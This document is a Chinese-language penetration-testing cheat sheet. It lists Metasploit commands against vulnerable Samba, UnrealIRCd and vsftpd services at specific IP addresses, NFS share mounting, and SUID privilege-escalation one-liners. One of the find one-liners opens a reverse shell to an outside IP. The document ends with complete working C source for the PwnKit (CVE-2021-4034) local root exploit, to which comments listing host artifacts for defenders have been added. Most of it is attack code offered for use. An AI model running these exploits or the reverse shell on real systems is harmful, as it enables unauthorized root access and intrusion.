metasploit

Samba(139:445)

msf > search cve:2017-7494
msfconsole
use exploit/linux/samba/is_known_pipename
set rhost 172.2.123.6
set RPORT 445
exploit

UnrealIRCd (6667)

exploit/linux/irc/unreal_ircd_3281_backdoor

vsftpd 2.3.4 (21)

exploit/unix/ftp/vsftpd_234_backdoor

nfs

共享文件系统

查看共享了哪些目录

showmount -e 192.168.57.3

mount挂载

mount -t nfs 192.168.57.3:/ /mnt/metasploitable2/

SUID利用

查找命令

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

bash

直接进入root交互

bash -p

find

指定一个文件然后执行任意命令

find /etc/passwd -exec whoami \;

find /etc/passwd -exec bash -c 'bash -i >& /dev/tcp/101.37.210.236/2333 0>&1' \;

nmap

早期 nmap 版本带有交互模式，因而允许用户执行 shell 命令；适用版本：nmap 2.02 至 5.21

nmap --interactive

vim

如果以SUID运行,可以读取硬盘所有文件

执行命令

:!ls -la
:whoami

把命令执行结果粘贴在光标所在行

:read !ls -la

cp

覆盖系统文件

nano

nano #进入nano编辑器
Ctrl + R
Ctrl + X

less、more

先指定文件查看,然后执行命令

less /etc/passwd

:!ls -la

awk

awk '{system("ls")}'
需要再输入一个换行才会执行命令并显示结果

awk 'BEGIN {system("/bin/bash")}'
直接输出命令结果

pkexec

尝试CVE-2021-4034

/*
* Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability
* Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis
* <moo@arthepsy.eu> Advisory:
* https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * C source text that main() below writes to pwnkit/pwnkit.c and compiles into
 * a shared object. It defines an empty gconv() and a gconv_init() that sets
 * the real and effective uid/gid to 0, then uses system() to reset PATH,
 * delete the 'GCONV_PATH=.' and 'pwnkit' directories created by main(), and
 * start /bin/sh, and finally calls exit(0).
 *
 * Defender note: the only on-disk cleanup performed by this PoC is the rm -rf
 * of those two directories; the shell is started with the PATH listed here,
 * not the caller's. See the advisory linked in the file header for the fix.
 */
char *shell = "#include <stdio.h>\n"
"#include <stdlib.h>\n"
"#include <unistd.h>\n\n"
"void gconv() {}\n"
"void gconv_init() {\n"
" setuid(0); setgid(0);\n"
" seteuid(0); setegid(0);\n"
" system(\"export "
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/"
"bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
" exit(0);\n"
"}";

/*
 * Stages the PoC in the current working directory and then runs
 * /usr/bin/pkexec with an empty argv and a crafted environment. The
 * mechanism and the vendor fix are described in the advisory linked in the
 * file header; argc/argv are unused.
 *
 * Host artifacts this program creates (useful as indicators when looking for
 * this PoC on a system):
 *   - a directory literally named 'GCONV_PATH=.' holding an executable file
 *     named 'pwnkit'
 *   - a directory 'pwnkit' holding gconv-modules, pwnkit.c and pwnkit.so
 * It also requires gcc on the host, which is itself a hardening point.
 *
 * Return value: execve() only returns on failure, and that case is not
 * handled, so main falls off the end without a return value then.
 */
int main(int argc, char *argv[]) {
FILE *fp;
/* Create the two working directories and the gconv-modules stub. */
system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x "
"'GCONV_PATH=./pwnkit'");
system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > "
"pwnkit/gconv-modules");
/* Write the embedded source (see `shell` above) and build it as a .so. */
fp = fopen("pwnkit/pwnkit.c", "w");
fprintf(fp, "%s", shell);
fclose(fp);
system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
/* Environment handed to pkexec; argv is a single NULL, i.e. argc == 0. */
char *env[] = {"pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT",
"SHELL=pwnkit", NULL};
execve("/usr/bin/pkexec", (char *[]){NULL}, env);
}